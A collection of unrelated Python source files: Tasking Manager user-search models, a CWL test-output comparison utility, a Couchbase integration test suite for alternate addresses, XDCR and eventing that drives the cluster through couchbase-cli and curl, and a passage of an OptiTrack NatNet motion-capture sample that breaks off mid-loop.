class UserSearchQuery(Model):
""" Describes a user search query, that a user may submit to filter the list of users """
username = StringType()
role = StringType(validators=[is_known_role])
mapping_level = StringType(serialized_name='mappingLevel', validators=[is_known_mapping_level])
page = IntType()
def __hash__(self):
""" Make object hashable so we can cache user searches"""
return hash((self.username, self.role, self.mapping_level, self.page))
class ListedUser(Model):
""" Describes a user within the User List """
id = LongType()
username = StringType()
role = StringType()
mapping_level = StringType(serialized_name='mappingLevel')
class UserSearchDTO(Model):
""" Paginated list of TM users """
def __init__(self):
super().__init__()
self.users = []
pagination = ModelType(Pagination)
users = ListType(ModelType(ListedUser))
class UserFilterDTO(Model):
""" DTO to hold all Tasking Manager users """
def __init__(self):
super().__init__()
self.usernames = []
pagination = ModelType(Pagination)
usernames = ListType(StringType)
|
<gh_stars>10-100
import json
from typing import Any, Dict, List, Optional, Set, Text
import junit_xml
REQUIRED = "required"
class TestResult:
"""Encapsulate relevant test result data."""
def __init__(
self,
return_code,
standard_output,
error_output,
duration,
classname,
message="",
):
# type: (int, Text, Text, float, Text, str) -> None
self.return_code = return_code
self.standard_output = standard_output
self.error_output = error_output
self.duration = duration
self.message = message
self.classname = classname
def create_test_case(self, test):
# type: (Dict[Text, Any]) -> junit_xml.TestCase
doc = test.get("doc", "N/A").strip()
if test.get("tags"):
category = ", ".join(test["tags"])
else:
category = REQUIRED
short_name = test.get("short_name")
case = junit_xml.TestCase(
doc,
elapsed_sec=self.duration,
file=short_name,
category=category,
stdout=self.standard_output,
stderr=self.error_output,
)
if self.return_code > 0:
case.failure_message = self.message
return case
class CompareFail(Exception):
@classmethod
def format(cls, expected, actual, cause=None):
# type: (Any, Any, Any) -> CompareFail
message = "expected: {}\ngot: {}".format(
json.dumps(expected, indent=4, sort_keys=True),
json.dumps(actual, indent=4, sort_keys=True),
)
if cause:
message += "\ncaused by: %s" % cause
return cls(message)
def compare_location(expected, actual):
# type: (Dict[str,Any], Dict[str,Any]) -> None
if "path" in expected:
comp = "path"
if "path" not in actual:
actual["path"] = actual["location"]
elif "location" in expected:
comp = "location"
else:
return
if actual.get("class") == "Directory":
actual[comp] = actual[comp].rstrip("/")
if expected[comp] != "Any" and (
not (
actual[comp].endswith("/" + expected[comp])
or ("/" not in actual[comp] and expected[comp] == actual[comp])
)
):
raise CompareFail.format(
expected,
actual,
f"{actual[comp]} does not end with {expected[comp]}",
)
def compare_contents(expected, actual):
# type: (Dict[str,Any], Dict[str,Any]) -> None
expected_contents = expected["contents"]
with open(actual["path"]) as f:
actual_contents = f.read()
if expected_contents != actual_contents:
raise CompareFail.format(
expected,
actual,
json.dumps(
"Output file contents do not match: actual '%s' is not equal to expected '%s'"
% (actual_contents, expected_contents)
),
)
def check_keys(keys, expected, actual):
# type: (Set[str], Dict[str,Any], Dict[str,Any]) -> None
for k in keys:
try:
compare(expected.get(k), actual.get(k))
except CompareFail as e:
raise CompareFail.format(
expected, actual, f"field '{k}' failed comparison: {str(e)}"
) from e
def compare_file(expected, actual):
# type: (Dict[str,Any], Dict[str,Any]) -> None
compare_location(expected, actual)
if "contents" in expected:
compare_contents(expected, actual)
other_keys = set(expected.keys()) - {"path", "location", "listing", "contents"}
check_keys(other_keys, expected, actual)
def compare_directory(expected, actual):
# type: (Dict[str,Any], Dict[str,Any]) -> None
if actual.get("class") != "Directory":
raise CompareFail.format(
expected, actual, "expected object with a class 'Directory'"
)
if "listing" not in actual:
raise CompareFail.format(
expected, actual, "'listing' is mandatory field in Directory object"
)
for i in expected["listing"]:
found = False
for j in actual["listing"]:
try:
compare(i, j)
found = True
break
except CompareFail:
pass
if not found:
raise CompareFail.format(
expected,
actual,
"%s not found" % json.dumps(i, indent=4, sort_keys=True),
)
compare_file(expected, actual)
def compare_dict(expected, actual):
# type: (Dict[str,Any], Dict[str,Any]) -> None
for c in expected:
try:
compare(expected[c], actual.get(c))
except CompareFail as e:
raise CompareFail.format(
expected, actual, f"failed comparison for key '{c}': {e}"
) from e
extra_keys = set(actual.keys()).difference(list(expected.keys()))
for k in extra_keys:
if actual[k] is not None:
raise CompareFail.format(expected, actual, "unexpected key '%s'" % k)
def compare(expected, actual): # type: (Any, Any) -> None
if expected == "Any":
return
if expected is not None and actual is None:
raise CompareFail.format(expected, actual)
try:
if isinstance(expected, dict):
if not isinstance(actual, dict):
raise CompareFail.format(expected, actual)
if expected.get("class") == "File":
compare_file(expected, actual)
elif expected.get("class") == "Directory":
compare_directory(expected, actual)
else:
compare_dict(expected, actual)
elif isinstance(expected, list):
if not isinstance(actual, list):
raise CompareFail.format(expected, actual)
if len(expected) != len(actual):
raise CompareFail.format(expected, actual, "lengths don't match")
for c in range(0, len(expected)):
try:
compare(expected[c], actual[c])
except CompareFail as e:
raise CompareFail.format(expected, actual, e) from e
else:
if expected != actual:
raise CompareFail.format(expected, actual)
except Exception as e:
raise CompareFail(str(e)) from e
def get_test_number_by_key(tests, key, value):
# type: (List[Dict[str, str]], str, str) -> Optional[int]
for i, test in enumerate(tests):
if key in test and test[key] == value:
return i
return None
|
import copy
import json, ast, filecmp, itertools
import os, shutil, ast
from threading import Thread
from subprocess import Popen, PIPE, check_output, STDOUT, CalledProcessError
from TestInput import TestInputSingleton, TestInputServer
from alternate_address.alternate_address_base import AltAddrBaseTest
from membase.api.rest_client import RestConnection, RestHelper
from couchbase_helper.cluster import Cluster
from remote.remote_util import RemoteMachineShellConnection
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from couchbase_helper.documentgenerator import BlobGenerator, JsonDocGenerator
from pprint import pprint
from testconstants import CLI_COMMANDS, LINUX_COUCHBASE_BIN_PATH,\
WIN_COUCHBASE_BIN_PATH, COUCHBASE_FROM_MAD_HATTER,\
WIN_TMP_PATH_RAW
class AlternateAddressTests(AltAddrBaseTest):
def setUp(self):
for server in TestInputSingleton.input.servers:
remote = RemoteMachineShellConnection(server)
remote.enable_diag_eval_on_non_local_hosts()
remote.disconnect()
super(AlternateAddressTests, self).setUp()
self.remove_all_alternate_address_settings()
self.cluster_helper = Cluster()
self.ex_path = self.tmp_path + "export{0}/".format(self.master.ip)
self.num_items = self.input.param("items", 1000)
self.client_os = self.input.param("client_os", "linux")
self.localhost = self.input.param("localhost", False)
self.json_create_gen = JsonDocGenerator("altaddr", op_type="create",
encoding="utf-8", start=0, end=self.num_items)
self.json_delete_gen = JsonDocGenerator("imex", op_type="delete",
encoding="utf-8", start=0, end=self.num_items)
def tearDown(self):
try:
super(AlternateAddressTests, self).tearDown()
except Exception as e:
print e
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
ClusterOperationHelper.cleanup_cluster(self.servers, self.servers[0])
def test_setting_alternate_address(self):
server1 = self.servers[0]
url_format = ""
secure_port = ""
secure_conn = ""
self.skip_set_alt_addr = False
shell = RemoteMachineShellConnection(server1)
if self.secure_conn:
cacert = self.get_cluster_certificate_info(server1)
secure_port = "1"
url_format = "s"
if not self.no_cacert:
secure_conn = "--cacert {0}".format(cacert)
if self.no_ssl_verify:
secure_conn = "--no-ssl-verify"
output = self.list_alt_address(server=server1, url_format = url_format,
secure_port = secure_port, secure_conn = secure_conn)
if output:
output, _ = self.remove_alt_address_setting(server=server1,
url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
mesg = 'SUCCESS: Alternate address configuration deleted'
if not self._check_output(mesg, output):
self.fail("Fail to remove alternate address")
output = self.list_alt_address(server=server1, url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
if output and output[0] != "[]":
self.fail("Fail to remove alternate address with remove command")
self.log.info("Start to set alternate address")
internal_IP = self.get_internal_IP(server1)
setting_cmd = "{0}couchbase-cli{1} {2}"\
.format(self.cli_command_path, self.cmd_ext,
"setting-alternate-address")
setting_cmd += " -c http{0}://{1}:{2}{3} --username {4} --password {5} {6}"\
.format(url_format, internal_IP , secure_port, server1.port,
server1.rest_username, server1.rest_password, secure_conn)
setting_cmd = setting_cmd + "--set --hostname {0} ".format(server1.ip)
shell.execute_command(setting_cmd)
output = self.list_alt_address(server=server1, url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
if output and output[0]:
output = output[0]
output = output[1:-1]
output = ast.literal_eval(output)
if output["hostname"] != server1.ip:
self.fail("Fail to set correct hostname")
else:
self.fail("Fail to set alternate address")
self.log.info("Start to add node to cluster use internal IP")
services_in = self.alt_addr_services_in
if "-" in services_in:
set_services = services_in.split("-")
else:
set_services = services_in.split(",")
i = 0
num_hostname_add = 1
for server in self.servers[1:]:
add_node_IP = self.get_internal_IP(server)
node_services = "kv"
if len(set_services) == 1:
node_services = set_services[0]
elif len(set_services) > 1:
if len(set_services) == len(self.servers[1:]):
node_services = set_services[i]
i += 1
if self.add_hostname_node and num_hostname_add <= self.num_hostname_add:
add_node_IP = server.ip
num_hostname_add += 1
try:
shell.alt_addr_add_node(main_server=server1, internal_IP=add_node_IP,
server_add=server, services=node_services,
cmd_ext=self.cmd_ext)
except Exception as e:
if e:
self.fail("Error: {0}".format(e))
rest = RestConnection(self.master)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
rest.monitorRebalance()
self.log.info("Create default bucket")
self._create_default_bucket(self.master)
buckets = rest.get_buckets()
status = RestHelper(rest).vbucket_map_ready(buckets[0].name)
if not status:
self.fail("Failed to create bucket.")
if self.run_alt_addr_loader:
if self.alt_addr_kv_loader:
self.kv_loader(server1, client_os = self.client_os)
if self.alt_addr_n1ql_query:
self.n1ql_query(server1.ip, self.client_os,
create_travel_sample_bucket=True)
if self.alt_addr_eventing_function:
self.create_eventing_function(server1, self.client_os,
create_travel_sample_bucket=True)
self.skip_set_alt_addr = True
alt_addr_status = []
if not self.skip_set_alt_addr:
for server in self.servers[1:]:
internal_IP = self.get_internal_IP(server)
status = self.set_alternate_address(server, url_format = url_format,
secure_port = secure_port, secure_conn = secure_conn,
internal_IP = internal_IP)
alt_addr_status.append(status)
if False in alt_addr_status:
self.fail("Fail to set alt address")
else:
self.all_alt_addr_set = True
if self.run_alt_addr_loader:
if self.alt_addr_kv_loader:
self.kv_loader(server1, self.client_os)
if self.alt_addr_n1ql_query:
self.n1ql_query(server1.ip, self.client_os)
remove_node = ""
if self.alt_addr_rebalance_out:
internal_IP = self.get_internal_IP(self.servers[-1])
reject_node = "ns_1@{0}".format(internal_IP)
self.log.info("Rebalance out a node {0}".format(internal_IP))
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\
ejectedNodes=[reject_node])
reb_status = rest.monitorRebalance()
self.assertTrue(reb_status, "Rebalance out node {0} failed".format(internal_IP))
remove_node = internal_IP
if self.alt_addr_rebalance_in and self.alt_addr_rebalance_out:
if remove_node:
free_node = remove_node
if self.add_hostname_node:
free_node = self.get_external_IP(remove_node)
cmd = 'curl -X POST -d "hostname={0}&user={1}&password={2}&services={3}" '\
.format(free_node, server1.rest_username, server1.rest_password,
self.alt_addr_rebalance_in_services)
cmd += '-u Administrator:password http://{0}:8091/controller/addNode'\
.format(server1.ip)
shell.execute_command(cmd)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\
ejectedNodes=[])
reb_status = rest.monitorRebalance()
self.assertTrue(reb_status, "Rebalance back in failed")
status = self.set_alternate_address(self.servers[-1], url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn,
internal_IP = free_node)
if status:
self.all_alt_addr_set = True
else:
self.all_alt_addr_set = False
else:
self.fail("We need a free node to add to cluster")
if self.run_alt_addr_loader:
if self.alt_addr_kv_loader:
self.kv_loader(server1, self.client_os)
if self.alt_addr_n1ql_query:
self.n1ql_query(server1.ip, self.client_os)
status = self.remove_all_alternate_address_settings()
if not status:
self.fail("Failed to remove all alternate address setting")
def test_alt_addr_with_xdcr(self):
url_format = ""
secure_port = ""
secure_conn = ""
self.setup_xdcr_cluster()
des_alt_addr_set = False
self.log.info("Create bucket at source")
src_master = self.clusters_dic[0][0]
self._create_buckets(src_master)
src_rest = RestConnection(src_master)
src_buckets = src_rest.get_buckets()
if src_buckets and src_buckets[0]:
src_bucket_name = src_buckets[0].name
else:
self.fail("Failed to create bucket at src cluster")
des_master = self.clusters_dic[1][0]
self.log.info("Create bucket at destination")
self._create_buckets(des_master)
des_rest = RestConnection(des_master)
des_buckets = des_rest.get_buckets()
if des_buckets and des_buckets[0]:
des_bucket_name = des_buckets[0].name
else:
self.fail("Failed to create bucket at des cluster")
for server in self.clusters_dic[0]:
internal_IP = self.get_internal_IP(server)
status = self.set_alternate_address(server, url_format = url_format,
secure_port = secure_port, secure_conn = secure_conn,
internal_IP = internal_IP)
self.all_alt_addr_set = True
self.kv_loader(src_master, "mac")
self.create_xdcr_reference(src_master.ip, des_master.ip)
src_num_docs = int(src_rest.get_active_key_count(src_bucket_name))
count = 0
src_num_docs = int(src_rest.get_active_key_count(src_bucket_name))
while count < 10:
if src_num_docs < 10000:
self.sleep(10, "wait for items written to bucket")
src_num_docs = int(src_rest.get_active_key_count(src_bucket_name))
count += 1
if src_num_docs == 10000:
self.log.info("all bucket items set")
break
if count == 2:
self.fail("bucket items does not set after 30 seconds")
self.create_xdcr_replication(src_master.ip, des_master.ip, src_bucket_name)
self.sleep(25, "time needed for replication to be created")
self.log.info("Reduce check point time to 30 seconds")
self.set_xdcr_checkpoint(src_master.ip, 30)
#self.set_xdcr_checkpoint(des_master.ip, 30)
self.log.info("Get xdcr configs from cluster")
shell = RemoteMachineShellConnection(self.master)
rep_id_cmd = "curl -u Administrator:password http://{0}:8091/pools/default/remoteClusters"\
.format(self.master.ip)
output, error = shell.execute_command(rep_id_cmd)
output = output[0][1:-1]
xdcr_config = json.loads(output)
cmd = "curl -u Administrator:password http://localhost:8091/sasl_logs/goxdcr "
cmd += "| grep 'Execution timed out' | tail -n 1 "
output, error = shell.execute_command(cmd)
self.log.info("Verify replication timeout due to alt addr does not enable at des cluster")
if xdcr_config["uuid"] in output[0] and "Execution timed out" in output[0]:
self.log.info("replication failed as expected as alt addr does not enable at des")
else:
self.fail("Alt addr failed to disable at des cluster")
count = 0
des_num_docs = int(des_rest.get_active_key_count(des_bucket_name))
while count < 6:
if src_num_docs != des_num_docs:
self.sleep(60, "wait for replication ...")
des_num_docs = int(des_rest.get_active_key_count(des_bucket_name))
count += 1
elif src_num_docs == des_num_docs:
self.fail("Replication should fail. Alt addr at des does not block")
break
if count == 6:
if not des_alt_addr_set:
self.log.info("This is expected since alt addr is not set yet")
des_alt_addr_status =[]
for server in self.clusters_dic[1]:
internal_IP = self.get_internal_IP(server)
des_alt_addr_status.append(self.set_alternate_address(server, url_format = url_format,
secure_port = secure_port, secure_conn = secure_conn,
internal_IP = internal_IP))
if False in des_alt_addr_status:
self.fail("Failed to set alt addr at des cluster")
else:
des_alt_addr_set = True
count = 0
self.log.info("Restart replication")
cmd = "curl -X POST -u Administrator:password "
cmd += "http://{0}:8091/settings/replications/{1}%2F{2}%2F{2} "\
.format(self.master.ip, xdcr_config["uuid"], des_bucket_name)
cmd += "-d pauseRequested="
try:
check_output(cmd + "true", shell=True, stderr=STDOUT)
self.sleep(20)
check_output(cmd + "false", shell=True, stderr=STDOUT)
except CalledProcessError as e:
print("Error return code: {0}".format(e.returncode))
if e.output:
self.fail(e.output)
des_rest = RestConnection(des_master)
self.log.info("Verify docs is replicated to des cluster")
while count < 6:
if src_num_docs != des_num_docs:
self.sleep(60, "wait for replication start...")
des_num_docs = int(des_rest.get_active_key_count(des_bucket_name))
count += 1
elif src_num_docs == des_num_docs:
self.log.info("Replication is complete")
break
if count == 6:
if des_alt_addr_set:
self.fail("Replication does not complete after 6 minutes")
self.delete_xdcr_replication(src_master.ip, xdcr_config["uuid"])
def remove_all_alternate_address_settings(self):
self.log.info("Remove alternate address setting in each node")
remove_alt = []
for server in self.servers:
shell = RemoteMachineShellConnection(server)
cmd = "{0}couchbase-cli{1} {2} -c {3}:{4} --username {5} --password {6} {7}"\
.format(self.cli_command_path, self.cmd_ext,
"setting-alternate-address", server.ip,
server.port, server.rest_username, server.rest_password,
"--remove")
output, error = shell.execute_command(cmd, debug=True)
if error:
remove_alt.append(error)
shell.disconnect()
if remove_alt:
self.log.error("Remove alt address failed: {0}".format(remove_alt))
return False
else:
return True
def remove_alt_address_setting(self, server=None, url_format = "", secure_port = "",
secure_conn = ""):
sub_command = "setting-alternate-address"
if server is None:
server = self.master
cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\
.format(self.cli_command_path, self.cmd_ext,
sub_command, url_format, server.ip, secure_port,
server.port, server.rest_username, server.rest_password,
secure_conn)
remove_cmd = cmd + " --remove"
shell = RemoteMachineShellConnection(server)
output, error = shell.execute_command(remove_cmd)
shell.disconnect()
return output, error
def list_alt_address(self, server=None, url_format = "", secure_port = "", secure_conn = ""):
sub_command = "setting-alternate-address"
if server is None:
server = self.master
cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\
.format(self.cli_command_path, self.cmd_ext,
sub_command, url_format, server.ip, secure_port,
server.port, server.rest_username, server.rest_password,
secure_conn)
list_cmd = cmd + " --list"
shell = RemoteMachineShellConnection(server)
output, error = shell.execute_command(list_cmd)
shell.disconnect()
return output
def set_alternate_address(self, server=None, url_format = "", secure_port = "",
secure_conn = "", internal_IP = ""):
self.log.info("Start to set alternate address")
if server is None:
server = self.master
shell = RemoteMachineShellConnection(server)
internal_IP = self.get_internal_IP(server)
setting_cmd = "{0}couchbase-cli{1} {2}"\
.format(self.cli_command_path, self.cmd_ext,
"setting-alternate-address")
setting_cmd += " -c http{0}://{1}:{2}{3} --username {4} --password {5} {6}"\
.format(url_format, internal_IP , secure_port, server.port,
server.rest_username, server.rest_password, secure_conn)
setting_cmd = setting_cmd + "--set --hostname {0} ".format(server.ip)
shell.execute_command(setting_cmd)
output = self.list_alt_address(server=server, url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
if output:
return True
else:
return False
def get_cluster_certificate_info(self, server):
"""
This will get certificate info from cluster
"""
cert_file_location = self.root_path + "cert.pem"
if self.os == "windows":
cert_file_location = WIN_TMP_PATH_RAW + "cert.pem"
shell = RemoteMachineShellConnection(server)
cmd = "{0}couchbase-cli{1} ssl-manage "\
.format(self.cli_command_path, self.cmd_ext)
cmd += "-c {0}:{1} -u Administrator -p password --cluster-cert-info > {2}"\
.format(server.ip, server.port,
cert_file_location)
output, _ = shell.execute_command(cmd)
if output and "Error" in output[0]:
self.fail("Failed to get CA certificate from cluster.")
shell.disconnect()
return cert_file_location
def kv_loader(self, server = None, client_os = "linux"):
if server is None:
server = self.master
buckets = RestConnection(server).get_buckets()
base_path = "/opt/couchbase/bin/"
if client_os == "mac":
base_path = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/bin/"
loader_path = "{0}cbworkloadgen{1}".format(base_path, self.cmd_ext)
cmd_load = " -n {0}:8091 -u Administrator -p password -j -b {1}"\
.format(server.ip, buckets[0].name)
error_mesg = "No alternate address information found"
try:
self.log.info("Load kv doc to bucket from outside network")
output = check_output("{0} {1}".format(loader_path, cmd_load), shell=True, stderr=STDOUT)
if output:
self.log.info("Output from kv loader: {0}".format(output))
except CalledProcessError as e:
print "Error return code: ", e.returncode
if e.output:
if self.all_alt_addr_set:
if "No alternate address information found" in e.output:
self.fail("Failed to set alternate address.")
else:
self.fail("Failed to load to remote cluster.{0}"\
.format(e.output))
else:
self.log.info("Error is expected due to alt addre not set yet")
""" param: default_bucket=False """
def n1ql_query(self, server_IP = None, client_os = "linux",
create_travel_sample_bucket=False):
if server_IP is None:
server_IP = self.master.ip
self._create_travel_sample_bucket(server_IP,
create_travel_sample_bucket=create_travel_sample_bucket)
base_path = "/opt/couchbase/bin/"
query_cmd = 'SELECT country FROM `travel-sample` WHERE name = "Excel Airways";'
if client_os == "mac":
base_path = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/bin/"
loader_path = "{0}cbq{1}".format(base_path, self.cmd_ext)
cmd_load = " -u Administrator -p password -e {0} -s '{1}'"\
.format(server_IP, query_cmd)
error_mesg = "No alternate address information found"
try:
self.log.info("Run query on travel-sample bucket from outside network")
output = check_output("{0} {1}".format(loader_path, cmd_load), shell=True, stderr=STDOUT)
if output:
self.log.info("Output from n1ql query: {0}".format(output))
if self.all_alt_addr_set:
if "No alternate address information found" in str(output):
self.fail("Failed to set alternate address.")
elif "Error" in str(output):
self.fail("Failed to find query node in port 8091.")
else:
self.fail("Failed to run query in remote cluster.{0}"\
.format(output))
else:
self.log.info("Error is expected due to alt addre not set yet")
except CalledProcessError as e:
if e.output:
if self.all_alt_addr_set:
if "No alternate address information found" in e.output:
self.fail("Failed to set alternate address.")
else:
self.fail("Failed to run query in remote cluster.{0}"\
.format(e.output))
else:
self.log.info("Error is expected due to alt addre not set yet")
def create_eventing_function(self, server = None, client_os = "linux",
create_travel_sample_bucket=False):
if server is None:
server_IP = self.master.ip
else:
server_IP = server.ip
self._create_buckets(server, num_buckets=2)
self._create_travel_sample_bucket(server)
base_path = "/opt/couchbase/bin/"
query_cmd = ''
rest = RestConnection(server)
try:
self.log.info("Create event eventingalt from outside network")
self._create_eventing_function(server)
self._deploy_function(server)
self._check_eventing_status(server)
self._undeploy_eventing_function(server)
self._delete_eventing_function(server)
except CalledProcessError as e:
if e.output:
if self.all_alt_addr_set:
if "No alternate address information found" in e.output:
self.fail("Failed to set alternate address.")
else:
self.fail("Failed to run query in remote cluster.{0}"\
.format(e.output))
else:
self.log.info("Error is expected due to alt addre not set yet")
def _create_travel_sample_bucket(self, server):
self.log.info("Create travel-sample bucket")
create_bucket_cmd = """curl -g -u Administrator:password \
http://{0}:8091/sampleBuckets/install \
-d '["travel-sample"]'""".format(server.ip)
output = check_output("{0}".format(create_bucket_cmd), shell=True,
stderr=STDOUT)
ready = RestHelper(RestConnection(server)).vbucket_map_ready("travel-sample")
if output:
self.log.info("Output from create travel-sample bucket: {0}"
.format(output))
self.sleep(25, "time to load and create indexes")
def _create_buckets(self, server, num_buckets=1):
if server is None:
server = self.master
create_bucket_command = """ curl -g -u Administrator:password \
http://{0}:8091/pools/default/buckets \
-d ramQuotaMB=256 -d authType=sasl -d replicaNumber=1 """.format(server.ip)
if num_buckets == 1:
self.log.info("Create bucket {0} ".format("bucket_1"))
create_bucket_command += " -d name=bucket_1 "
output = check_output("{0}".format(create_bucket_command), shell=True,
stderr=STDOUT)
if output:
self.log.info("Output from create bucket bucket_1")
if num_buckets > 1:
count = 1
while count <= num_buckets:
bucket_name = "bucket_{0}".format(count)
self.log.info("Create bucket {0}".format(bucket_name))
create_bucket = create_bucket_command
create_bucket += " -d name={0} ".format(bucket_name)
print "\ncreate bucket command: ", create_bucket
output = check_output("{0}".format(create_bucket), shell=True,
stderr=STDOUT)
if output:
self.log.info("Output from create bucket {0}".format(bucket_name))
ready = RestHelper(RestConnection(server)).vbucket_map_ready(bucket_name)
if not ready:
self.fail("Could not create bucket {0}".format(bucket_name))
count += 1
self.sleep(5)
def _create_default_bucket(self, server):
if server is None:
server = self.master
create_bucket_command = """ curl -g -u Administrator:password \
http://{0}:8091/pools/default/buckets -d name=default \
-d ramQuotaMB=256 -d authType=sasl -d replicaNumber=1 """.format(server.ip)
self.log.info("Create default bucket ")
output = check_output("{0}".format(create_bucket_command), shell=True,
stderr=STDOUT)
if output:
self.log.info("Output from create bucket default {0}".format(output))
def _create_eventing_function(self, server):
eventing_name = "eventingalt"
function_body = ' {"depcfg":{"buckets":[{"alias":"travelalt","bucket_name":"bucket_2", "access":"rw"}],"metadata_bucket":"bucket_1","source_bucket":"travel-sample", '
function_body += ' "curl":[]},"settings":{"worker_count":3,"execution_timeout":60, "user_prefix":"eventing","log_level":"INFO","dcp_stream_boundary":"everything", '
function_body += ' "processing_status":false,"deployment_status":false,"description":"", "deadline_timeout":62}, '
function_body += '"appname":"{0}", '.format(eventing_name)
function_body += """ "appcode":"function OnUpdate(doc, meta) {\\n travelalt[meta.id]=doc\\n log('docId', meta.id);\\n}\\nfunction OnDelete(meta) {\\n}", """
function_body += ' "status":"undeployed","uiState":"inactive"} '
cmd = "curl -g -u Administrator:password http://{0}:8096/api/v1/functions/{1} -d \'{2}\'"\
.format(server.ip, eventing_name, function_body)
output = check_output(cmd, shell=True, stderr=STDOUT)
""" Correct output from command line
{
"code": 0,
"info": {
"status": "Stored function: 'eventingalt' in metakv",
"warnings": null
}
}
"""
if "Stored function: 'eventingalt' " not in str(output):
self.fail("Fail to create eventing function")
def _deploy_function(self, server):
eventing_name = "eventingalt"
cmd = "curl -u Administrator:password http://{0}:8096/api/v1/functions/{1}/settings"\
.format(server.ip,eventing_name)
cmd += """ -d '{"deployment_status":true,"processing_status":true}' """
output = check_output(cmd, shell=True, stderr=STDOUT)
self.sleep(60, "wait for function deployed")
def _check_eventing_status(self, server):
eventing_name = "eventingalt"
cmd = "curl GET -u Administrator:password http://{0}:8096/api/v1/functions/{1}/settings"\
.format(server.ip, eventing_name)
output = check_output(cmd, shell=True, stderr=STDOUT)
if '"deployment_status": true' in str(output):
return True
else:
return False
def _undeploy_eventing_function(self, server):
eventing_name = "eventingalt"
cmd = "curl -u Administrator:password http://{0}:8096/api/v1/functions/{1}/settings"\
.format(server.ip,eventing_name)
cmd += """ -d '{"deployment_status":false,"processing_status":false}' """
output = check_output(cmd, shell=True, stderr=STDOUT)
self.sleep(20, "wait to undeploy function")
def _delete_eventing_function(self, server):
cmd = " curl -X DELETE -u Administrator:password http://{0}:8096/api/v1/functions/"\
.format(server.ip)
output = check_output(cmd, shell=True, stderr=STDOUT)
if 'Function: eventingalt deleting in the background' in str(output):
return True
else:
return False
|
<reponame>humancomputerintegration/dextrEMS<gh_stars>1-10
#Copyright © 2018 Naturalpoint
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
#http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
# OptiTrack NatNet direct depacketization sample for Python 3.x
#
# Uses the Python NatNetClient.py library to establish a connection (by creating a NatNetClient),
# and receive data via a NatNet connection and decode it using the NatNetClient library.
from NatNetClient import NatNetClient
import time
import math
# hand_attitude, hand_heading, hand_bank
# finger_attitude, finger_heading, finger_bank
def quaternion_to_euler(qx, qy, qz, qw):
"""Convert quaternion (qx, qy, qz, qw) angle to euclidean (x, y, z) angles, in degrees.
Equation from http://www.euclideanspace.com/maths/geometry/rotations/conversions/quaternionToEuler/"""
heading = math.atan2(2*qy*qw-2*qx*qz , 1 - 2*qy**2 - 2*qz**2)
attitude = math.asin(2*qx*qy + 2*qz*qw)
bank = math.atan2(2*qx*qw-2*qy*qz , 1 - 2*qx**2 - 2*qz**2)
return [math.degrees(angle) for angle in [attitude, heading, bank]] # TODO: May need to change some things to negative to deal with left-handed coordinate system.
# This is a callback function that gets connected to the NatNet client and called once per mocap frame.
# def receiveNewFrame( frameNumber, markerSetCount, unlabeledMarkersCount, rigidBodyCount, skeletonCount,
# labeledMarkerCount, timecode, timecodeSub, timestamp, isRecording, trackedModelsChanged ):
# print( "Received frame", frameNumber )
# This is a callback function that gets connected to the NatNet client. It is called once per rigid body per frame
def receiveRigidBodyFrame( id, position, rotation ):
global hand_attitude, hand_heading, hand_bank
global finger_attitude, finger_heading, finger_bank
# print( "Received frame for rigid body", id )
if id == 2:
hand_qx, hand_qy, hand_qz, hand_qw = rotation
hand_attitude, hand_heading, hand_bank = quaternion_to_euler(hand_qx, hand_qy, hand_qz, hand_qw)
# print(str("{0:.2f}".format(tPitch)) + " " + str("{0:.2f}".format(tYaw)) + " "
# + str("{0:.2f}".format(tRoll)) + " " + str("{0:.2f}".format(tW)))
# print(str("{0:.2f}".format(hand_attitude)) + " " + str("{0:.2f}".format(hand_heading)) + " "
# + str("{0:.2f}".format(hand_bank)))
if id == 3:
finger_qx, finger_qy, finger_qz, finger_qw = rotation
finger_attitude, finger_heading, finger_bank = quaternion_to_euler(finger_qx, finger_qy, finger_qz, finger_qw)
# print(str("{0:.2f}".format(tPitch)) + " " + str("{0:.2f}".format(tYaw)) + " "
# + str("{0:.2f}".format(tRoll)) + " " + str("{0:.2f}".format(tW)))
# print(str("{0:.2f}".format(finger_attitude)) + " " + str("{0:.2f}".format(finger_heading)) + " "
# + str("{0:.2f}".format(finger_bank)))
# print(rotation)
# This will create a new NatNet client
streamingClient = NatNetClient()
# Configure the streaming client to call our rigid body handler on the emulator to send data out.
streamingClient.newFrameListener = None #receiveNewFrame
streamingClient.rigidBodyListener = receiveRigidBodyFrame
# Start up the streaming client now that the callbacks are set up.
# This will run perpetually, and operate on a separate thread.
streamingClient.run()
set_offset = False
count = 0
# zero delta angle
# temp = input("press any key to zero the delta angle")
# hand_attitude_off, hand_heading_off, hand_bank_off = hand_attitude, hand_heading, hand_bank
# finger_attitude_off, finger_heading_off, finger_bank_off = finger_attitude, finger_heading, finger_bank
hand_attitude, hand_heading, hand_bank = 0, 0, 0
finger_attitude, finger_heading, finger_bank = 0, 0, 0
del_attitude_offset = 0
del_heading_offset = 0
del_bank_offset = 0
hand_heading_off = 0
finger_heading_off = 0
while True:
# del_attitude = abs( abs(finger_attitude - hand_attitude_off) - abs(hand_attitude - hand_attitude_off))
# del_heading = abs( abs(finger_heading - finger_heading_off) - abs(hand_heading - hand_heading_off))
# del_bank = abs( abs(finger_bank - finger_bank_off) - abs(hand_bank - hand_bank_off))
del_attitude = abs(finger_attitude - hand_attitude )
del_heading = abs(finger_heading - hand_heading )
